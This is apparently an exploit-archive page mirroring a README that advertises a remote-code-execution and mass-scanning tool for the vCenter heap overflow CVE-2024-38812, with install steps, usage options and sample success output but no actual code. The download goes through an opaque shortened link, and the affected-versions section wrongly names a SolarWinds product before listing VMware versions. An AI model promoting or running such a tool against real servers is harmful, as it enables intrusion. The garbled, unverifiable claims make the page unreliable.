Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-38812 PoC β€” Heap-overflow vulnerability

Source
https://github.com/maybeheisenberg/CVE-2024-38812
Associated Vulnerability
Title:Heap-overflow vulnerability (CVE-2024-38812)
Description:TheΒ vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol.Β A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.
Readme
# πŸ›  CVE-2024-38812 Exploit

## 🌟 Description
CVE-2024-38812 is a critical unauthenticated heap-overflow vulnerability in VMware vCenter Server that may potentially lead to remote code execution. The vulnerability affects vCenter Server versions 8.0 and 7.0, as well as VMware Cloud Foundation versions 5.x and 4.x. 

## βš™οΈ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/RJAWT)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-38812
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## πŸš€ Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-38812.
```

## πŸ“Š Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## πŸ—’ Affected Versions

The vulnerability affects the following versions of SolarWinds Access Rights Manager (ARM):

VMware vCenter Server < 8.0 U3b

VMware vCenter Server < 7.0 U3s

VMware Cloud Foundation = 5.x

VMware Cloud Foundation = 4.x

## πŸ“ˆ CVSS Information
Score: 9.8

Severity: CRITICAL

Confidentiality: High

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged
File Snapshot

 [4.0K]  /data/pocs/08636f0552a96e10e7fc64fa8a6376054a3a200c
└── [2.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’